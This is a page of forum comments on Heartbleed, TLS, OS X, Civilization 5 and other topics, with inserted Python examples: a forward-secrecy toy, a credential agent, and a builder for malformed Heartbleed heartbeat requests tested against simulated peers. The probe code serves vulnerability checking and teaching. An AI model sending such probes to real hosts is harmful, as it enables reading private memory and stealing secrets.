Comment Re:Small donations to organizations are one thing (Score 1) 268

Oh, please. OS X / Darwin's implementation of the Unix standard is screwier than half the Linux distros I've used. It's the same from Mac to Mac, sure, but that doesn't mean much; the same applies from SLES machine to SLES machine or from Nokia N900 to Nokia N900. Their filesystem layout is weird, they don't use standard files for some things, or do so bizarrely (some years back, I found their fstab manpage to be wrong and the file itself to be basically useless). Their user system is not entirely conventional.

There is no such singular thing as "the real Unix command line", but I could get a (descendant of) Bourne shell on versions of NT earlier than OS X existed.

Comment Re:Tools for checking (Score 1) 151

The cool feature of Pacemaker is that it checks TLS *clients*, actually. There are other tools for server checks (one of which is included with Pacemaker) but it's actually very important to make sure any clients you have are invulnerable to Heartbleed as well. Software that ships with bundled or integrated OpenSSL libraries - and I've seen quite a few - could be vulnerable to this.

Comment Re:https is dead (Score 1) 151

If the server (or client, for that matter) was hit with Heartbleed *during* (or shortly after) the session, the symmetric encryption key may have been retrieved and an attacker who had recorded the whole session could then decrypt it. If the session was ongoing and they were in position to do so, they could MitM it.

Similarly, if the attacker used Heartbleed during the key exchange, they might have leaked the private information (from either endpoint) needed to derive the symmetric key, even if for some reason they didn't get the key directly. Same impact as above.

If the attacker had used Heartbleed to steal the authentication private key prior to your session, they could have hit you with a MitM attack (appearing to be the authentic server) and you wouldn't have known.

If the attacker recorded your session but did not MitM it *or* use Heartbleed on the server while the symmetric key was in memory, you're safe (even if they stole the private key beforehand, much less afterward). That's the beauty of PFS.
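The four cases in this comment come down to one question: does the recorded transcript plus whatever the attacker stole let them compute the session key? The following is an added example (not from the original post) that runs that comparison in toy arithmetic. It models an ephemeral DH handshake next to an RSA key-exchange handshake and gives the attacker, in turn, the long-term key and a leaked copy of the server's in-flight handshake memory. The DH group, the RSA modulus, the SHA-256 "PRF" and the dictionary "transcripts" are assumptions chosen for readability and are far too small to be secure.

```python
"""Why stealing the long-term key decrypts recorded RSA-key-exchange sessions but
not recorded DHE sessions, and why a leak *during* the handshake does.
Toy parameters (assumption for illustration only, not secure)."""
import hashlib
import secrets

# Toy DH group: real TLS uses 2048-bit or larger groups (assumption).
DH_P = 2**127 - 1
DH_G = 3

# Toy long-term RSA key for the RSA key-exchange comparison: textbook RSA, no padding (assumption).
RSA_P, RSA_Q = 1000000007, 998244353
RSA_N = RSA_P * RSA_Q
RSA_E = 65537
RSA_D = pow(RSA_E, -1, (RSA_P - 1) * (RSA_Q - 1))   # needs Python 3.8+


def derive_key(secret):
    """Stand-in for the TLS PRF: 32-byte session key from the shared secret."""
    return hashlib.sha256(secret.to_bytes(16, "big")).digest()


def dhe_handshake():
    """Ephemeral DH. A passive recorder sees A and B (and a signature over them
    made with the long-term key); the exponents exist only while the handshake runs."""
    a = secrets.randbelow(DH_P - 2) + 1
    b = secrets.randbelow(DH_P - 2) + 1
    A, B = pow(DH_G, a, DH_P), pow(DH_G, b, DH_P)
    transcript = {"A": A, "B": B}
    server_memory = {"b": b}            # what a Heartbleed read *during* the handshake could expose
    return transcript, server_memory, derive_key(pow(B, a, DH_P))


def rsa_kx_handshake():
    """RSA key exchange: the client encrypts the pre-master secret to the server's long-term key,
    so the transcript itself contains everything the key holder needs."""
    pms = secrets.randbelow(RSA_N - 1) + 1
    transcript = {"encrypted_pms": pow(pms, RSA_E, RSA_N)}
    return transcript, derive_key(pms)


def recorder_attacks_dhe(transcript, stolen_long_term_key=None, leaked_server_memory=None):
    """Recover the session key of a recorded DHE session, if possible.

    stolen_long_term_key is deliberately unused: whenever it was stolen, before or after,
    it only lets the attacker impersonate the server in *live* sessions (MitM). It gives
    no path from A and B back to g^ab short of a discrete logarithm, so a session that was
    merely recorded stays sealed. Only the ephemeral exponent, leaked while it was in
    memory, opens it."""
    if leaked_server_memory and "b" in leaked_server_memory:
        return derive_key(pow(transcript["A"], leaked_server_memory["b"], DH_P))
    return None


def recorder_attacks_rsa_kx(transcript, stolen_private_exponent):
    """With RSA key exchange the long-term private key decrypts every recorded session,
    past or future, which is exactly what PFS is meant to prevent."""
    pms = pow(transcript["encrypted_pms"], stolen_private_exponent, RSA_N)
    return derive_key(pms)


if __name__ == "__main__":
    t, mem, key = dhe_handshake()
    print("DHE + stolen signing key :", recorder_attacks_dhe(t, stolen_long_term_key="stolen") == key)
    print("DHE + leaked handshake   :", recorder_attacks_dhe(t, leaked_server_memory=mem) == key)
    t2, key2 = rsa_kx_handshake()
    print("RSA-kx + stolen priv key :", recorder_attacks_rsa_kx(t2, RSA_D) == key2)
```

The usage block prints False, True, True, which is the comment's point in three lines: the stolen long-term key matters for RSA key exchange and for active MitM, but a passively recorded DHE session is only exposed if the ephemeral state was read while it existed.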

Comment Re:The CA should not revoke the certificates, (Score 1) 151

So does IE10.

Internet Options -> Advanced -> Security (scroll near bottom) -> "Check for publisher's certificate revocation" and "Check for server's certificate revocation" are both checked for me. I know at least one of those options dates back to IE6, in fact, although it may have been inactive by default back then. I don't know when those options were made default, but at a guess I'd say IE8 or IE9.

As a side note, if you are running Vista or later but *not* on IE11, you have TLS 1.1 and 1.2 disabled by default. They're easy to turn on (same place as above, just scroll a bit lower).

Comment Re:AI Optimization? (Score 2) 89

Your requests are, unfortunately, somewhat contradictory. You ask for a smarter AI (that doesn't put ranged units in front, for example) and then ask for one that processes faster. You complain about the late-game AI time (where the decision trees are *huge*), then say you want the AI to give a harder game without handicaps.

Don't get me wrong, I want to see optimizations too. But, I think they did a pretty decent job of balance, especially in the expansions (the original game was kind of bad in many ways, AI included). Diplomacy has gotten a *lot* better, partially because the AI's motivations are more transparent. The AI unit management is non-ideal, but it's rarely outright bad anymore (and can in fact be really good at specific goals, like "capture that barbarian camp"). As for handicaps, the AI *does* play dumber/friendlier at the lower difficulties, and always has; the point at which the AI starts needing to cheat, and the degree of its cheating, has crept up over time though.

Comment Re:Shut up and take my money (Score 2) 89

Those are good critiques of Civ5. There are more, of course, but *most* of them boil down to the original release of the game being, basically, too big a change for them to get it right.

Let me say that again: Civ 5 was *badly* flawed at release, because it was too big a change.

For example, in a game where each unit (and tile, since they go together) is so much more precious than they were before, the 10HP system (where even a curbstomp battle costs 10% of your health, and the enemy rolling just a *little* too well can easily kill a unit that should have been wounded but near-guaranteed to survive) is stupid. They fixed that in the first expansion, and it made combat *much* better.

Then there's the silliness where ranged units turn into melee units as they upgrade. That is, sadly, still present in a few units (chariot archers, etc.) but it's way less common than it once was, and there are actual ranged units in the late-game now.

The original culture system was undeniably silly. The new one is better in many ways, although the lines between things that give faith and things that give culture and things that give tourism still feels a bit arbitrary. I mean, shouldn't world wonders *inherently* give tourism? Shouldn't religious buildings have a cultural impact as well? It's weird.

On the other hand, there are good things that I think you missed, too. You complain about three ways to trade in C5:BNW, but I see more than that (unit transfers are not explicitly trades, but they achieve much the same thing, and AI goodwill is effectively a commodity you can sometimes trade) and Alpha Centauri had the same things (Econ tech + treaties, direct trade over comlink, vote-buying in council). The tech tree has plenty of absurdities, but what else is new? That's hardly something Civ5-specific, and the power level progressions throughout the game are pretty good.

Comment Several! (Score 4, Informative) 239

There have been a number of sites.
SSLLabs scanner has been updated to check for Heartbleed, and also will report when the cert validity starts (handy if you want to see whether they're using a new cert). https://www.ssllabs.com/ssltes...
LastPass has a pretty decent scanner that just focuses on Heartbleed (without all the other info that you get from SSLLabs): https://lastpass.com/heartblee...
There are some others out there as well, of course.

There's even one for client-side testing (almost as critical):
Pacemaker is an awesome little POC script (python 2.x) for testing whether a *client* is vulnerable (many that use OpenSSL are...). https://github.com/Lekensteyn/...

Comment Re:OSX not affected? (Score 1) 239

0.9.8 doesn't support any protocol newer than TLS 1.0, so while it's safe from Heartbleed it's also old and verging on deprecated.

Also, it's not that rare for software to use its own copy of OpenSSL, either as a bundled library or statically compiled into the program. I don't actually know of any Mac software that I'm sure does this, but that's not saying much since I don't use a Mac. Things I would expect to find it in are cross-platform programs that use OpenSSL but want a newer branch than 0.9.8 (Python maybe?).

Comment Re:Don't forget about the other recent problems (Score 1) 239

Well, Microsoft's CAPI (CryptoAPI) actually, not IIS. IIS uses CAPI, but IIS is no more a crypto toolkit than Apache or lighttpd are. A vuln in CAPI (they've happened before) could also affect clients (IE, Outlook, anything else using the platform APIs...).

Besides, we're still waiting on an NSS issue. NSS isn't so much *broadly* used - I know of only a few product families that use it - as it is *heavily* used. The product families in question are Mozilla anything (Firefox, mostly; the N stands for "Netscape") and Chrome (for PCs). Very few browsers (though not zero; Chrome on Android 4.1 uses a vulnerable version of OpenSSL) are/were vulnerable to Heartbleed, but they'll get their turn eventually!

Comment Re:Difficult to defend against (Score 1) 630

Clearly, the solution is railgun-based point defense! Sure, it'll have a lower rate of fire than the current CIWS units, but imagine the light show you'd get from the sparks when a pair of opposing slugs run into each other at a combined Mach 12 or so?

Impractical today, of course, but technology marches on. In the meantime, it isn't actually that hard to deflect the projectile enough... if you can hit it at any meaningful distance. That's going to be quite impractical (just hitting it at all is likely impractical) so for the moment, yeah. Add to that the ability to scale up the gun faster than people can realistically produce defense (my WAG there, but I suspect it's true nonetheless) and offense is taking a lead right now.

On the other hand, that's been true for a long time in a different way, which also brings me to the best defensive measure I can think of: a few hundred feet of H2O. Phalanx can't hit a torpedo, either...

Comment Re:Sportmanship (Score 1) 116

Meanwhile, in some MOBAs (I don't like LoL, but I've played a bit and used to play DotA, still play HoN, and occasionally play DotA2 or Smite), "GG" has become a term of mockery. Not universally, of course, but I've seen it after one team gets massively more powerful than the other and rather than pushing to end the game, they ignore structures entirely and focus on just killing the opponents over and over again (thus drawing out the game), especially if some people on the other team refuse to forfeit (it happens). There's nothing remotely good about that game - it's trolling, pure and simple - but that won't stop the trolls from saying so.

Comment Re:The Re-Hate Campaign (Score 1) 1116

Except, of course, that nobody has asserted that he couldn't be CEO. Many people said that he shouldn't, but nobody said he couldn't. Big difference.

Oh, and if you don't see how giving him direct control of HR and of Mozilla's finances (which could then be used to make contributions in the company's name) is a risk, you're an idiot. Mozilla is a pro-gay-rights organization, by company policy and internal culture. Eich's actions undermined Mozilla in *exactly* the same way (though not to the same degree) as if he were advocating death or criminalization.

Oh, and to a certain extent, Prop 8 was an attempt to criminalize gays. Married couples receive a large number of legal benefits (taxes being an obvious one). A gay couple who tried to claim those benefits would be criminals. That's the weakest part of my response to you (because they could simply not *try* to claim them, merely being deprived rather than criminalized), and I almost left it off, but it's worth considering. Similarly, under DOMA, a married gay couple who filed federal taxes as "married, filing jointly" would be considered to have committed tax fraud.

Comment Re:Minimal jargon explanation (Score 1) 303

Oh, just an addendum: This works against clients, too. So if an attacker can get between your smartphone and the Internet - really easy if using a public WiFi access point, such as at a café - they can dump all the secrets that your client knows when it tries to connect to its server. This could be stored images, messages, passwords, cached details of any kind, and so on. This can happen even if the server is *not* vulnerable, so long as the client is.

Seriously, scary bug.
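The check that Pacemaker runs against clients (see "Re:Tools for checking" and "Several!" above) and that the server scanners run against servers is the same: send a heartbeat request whose declared payload_length is larger than the payload actually carried, then see whether the peer echoes back more bytes than it was given. The following is an added example, not code from the original post or from Pacemaker, that builds such a probe, reassembles a possibly fragmented heartbeat reply, and classifies it. Network I/O is replaced by two constructed stand-in peers (one modelling the unpatched copy, one modelling a patched peer that drops the request); record framing follows RFC 5246/6520, while the probe payload, claimed length and "heap contents" are constructed sample data.

```python
"""Heartbleed over-read check: a peer is vulnerable when its heartbeat response
carries more payload than the request actually contained. Constructed peers stand
in for the remote side; nothing here touches the network."""
import struct

HEARTBEAT_RECORD = 0x18          # TLS ContentType heartbeat(24), RFC 6520
HB_REQUEST, HB_RESPONSE = 1, 2   # HeartbeatMessageType
TLS_1_1 = 0x0302                 # record-layer version used by the constructed peers
MAX_FRAGMENT = 2**14             # TLS record fragment limit; long replies span several records


def tls_record(content_type, version, fragment):
    return struct.pack("!BHH", content_type, version, len(fragment)) + fragment


def heartbeat_message(hb_type, declared_length, payload, padding=b"\x00" * 16):
    # RFC 6520: type(1) || payload_length(2) || payload || padding (at least 16 bytes)
    return struct.pack("!BH", hb_type, declared_length) + payload + padding


def build_probe(real_payload=b"\x01\x02\x03\x04", claimed_length=0x4000, version=TLS_1_1):
    """Heartbeat request that lies about its payload length. RFC 6520 section 4 says a
    correct peer must silently discard it; an unpatched peer trusts the field."""
    if claimed_length <= len(real_payload):
        raise ValueError("probe must claim more bytes than it carries")
    return tls_record(HEARTBEAT_RECORD, version, heartbeat_message(HB_REQUEST, claimed_length, real_payload))


def split_records(data):
    """(content_type, version, fragment) for each complete record; a trailing partial record is truncated."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, version, length = struct.unpack_from("!BHH", data, off)
        records.append((ctype, version, data[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def classify_response(data, sent_payload):
    """'vulnerable' plus the leaked bytes, 'echo' (honest reply), or 'silent' (request dropped)."""
    # One heartbeat message may be spread over several records: reassemble before parsing.
    hb = b"".join(frag for ctype, _v, frag in split_records(data) if ctype == HEARTBEAT_RECORD)
    if len(hb) < 3:
        return "silent", b""
    hb_type, declared = struct.unpack_from("!BH", hb, 0)
    if hb_type != HB_RESPONSE:
        return "silent", b""
    payload = hb[3:3 + declared]
    if len(payload) > len(sent_payload):
        return "vulnerable", payload[len(sent_payload):]
    return "echo", b""


# ---- constructed peers (assumption: models, not OpenSSL) ----
def vulnerable_peer(probe, heap_contents):
    """Unpatched behaviour: copies payload_length bytes starting at the request payload,
    so whatever follows it in memory (heap_contents here) is echoed back."""
    frag = split_records(probe)[0][2]
    _t, declared = struct.unpack_from("!BH", frag, 0)
    real_payload = frag[3:-16]
    echoed = (real_payload + heap_contents)[:declared]
    body = heartbeat_message(HB_RESPONSE, declared, echoed)
    return b"".join(tls_record(HEARTBEAT_RECORD, TLS_1_1, body[i:i + MAX_FRAGMENT])
                    for i in range(0, len(body), MAX_FRAGMENT))


def patched_peer(probe):
    """Patched behaviour: the malformed request is discarded without a reply."""
    return b""


if __name__ == "__main__":
    sent = b"\x01\x02\x03\x04"
    probe = build_probe(sent, claimed_length=64)
    print(classify_response(vulnerable_peer(probe, b"session_cookie=SECRET" * 5), sent))
    print(classify_response(patched_peer(probe), sent))
```

Against a client, the same classify_response runs on the client's reply after the probe is sent from the server side of the handshake, which is why a vulnerable client leaks to any server it connects to even when the server is patched. Treat "silent" as inconclusive rather than safe: it also covers peers that never negotiated the heartbeat extension.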

Comment Re:We're all fucked (Score 1) 303

You don't have to run it as root. You only have to run it such that nobody *except* root can start, spoof, or debug it. It needs to be something that "clients can trust it because compromising it would mean the OS is already compromised", not something that "the entire operating system trusts it, so that if it gets compromised it can compromise everything else". I realize what I said was unclear.

Besides, how is the attacker going to compromise it anyhow? It's not exposed to any remote services. Yes, it could be a local EoP vector if you ran it as root (so don't do that) but the only way *to* attack it is to already have arbitrary code execution on the machine.

Oh, and your "scatter parts of the password" idea is truly, incredibly, awful. Not only does that provide no real security (just obfuscation at best; it's still vulnerable to an attack like this with a bit more effort), it adds a lot of wasted effort. We're trying to build actual security here, not DRM...
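The trust model described in this comment ("clients can trust it because compromising it would mean the OS is already compromised") is what a per-user credential agent on a Unix socket gives you when it runs as the user rather than as root and authenticates callers with kernel-supplied peer credentials instead of anything the client sends. The following is an added example, not code from the original post, showing that pattern. It assumes Linux (SO_PEERCRED and prctl are Linux-specific), and the request protocol (a secret name in, the secret out) and the in-memory store are hypothetical stand-ins.

```python
"""Per-user credential agent: runs as the user, listens on a Unix socket, and serves
only callers whose kernel-verified uid matches its own. Linux-only (assumption)."""
import ctypes
import os
import socket
import struct

PR_SET_DUMPABLE = 4   # Linux prctl option


def disable_ptrace_attach():
    """Clear the dumpable flag so unprivileged processes of the same uid can no longer
    ptrace-attach or read /proc/<pid>/mem. Root still can, which matches the stated model:
    compromising the agent should require already owning the machine."""
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0:
        raise OSError(ctypes.get_errno(), "prctl(PR_SET_DUMPABLE) failed")


def peer_credentials(conn):
    """(pid, uid, gid) of the process on the other end, filled in by the kernel.
    Unlike a uid sent inside the request, the client cannot spoof this."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    return struct.unpack("3i", raw)


def authorize_peer(creds, owner_uid):
    """Only the owning uid is served. Root is deliberately not special-cased: it can
    already read the agent's memory, so granting it the API adds nothing."""
    _pid, uid, _gid = creds
    return uid == owner_uid


def handle(conn, store, owner_uid):
    """One request: authenticate the peer, then answer a lookup. Returns True if served."""
    if not authorize_peer(peer_credentials(conn), owner_uid):
        conn.sendall(b"DENIED\n")
        return False
    name = conn.recv(256).strip().decode("ascii", "replace")
    conn.sendall(store.get(name, b"") + b"\n")
    return True


def serve(path, store):
    """Stand-alone agent loop. The umask keeps the socket node 0700 from the moment it exists,
    and the process never needs root: it owns only its own user's secrets."""
    disable_ptrace_attach()
    old_umask = os.umask(0o077)
    try:
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)
    finally:
        os.umask(old_umask)
    srv.listen(4)
    owner_uid = os.getuid()
    while True:
        conn, _ = srv.accept()
        with conn:
            handle(conn, store, owner_uid)


if __name__ == "__main__":
    # Constructed sample store; a real agent would load this from an encrypted file.
    serve(os.path.expanduser("~/.agent.sock"), {"db_password": b"hunter2"})
```

Note what this does not do: it does not try to hide the secrets inside the agent's memory. Once an attacker has code execution as the same user and the dumpable flag is off, they still have to get root (or an equivalent EoP) to read the agent, which is the boundary the comment argues for; scattering fragments of the password around would not move that boundary at all.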
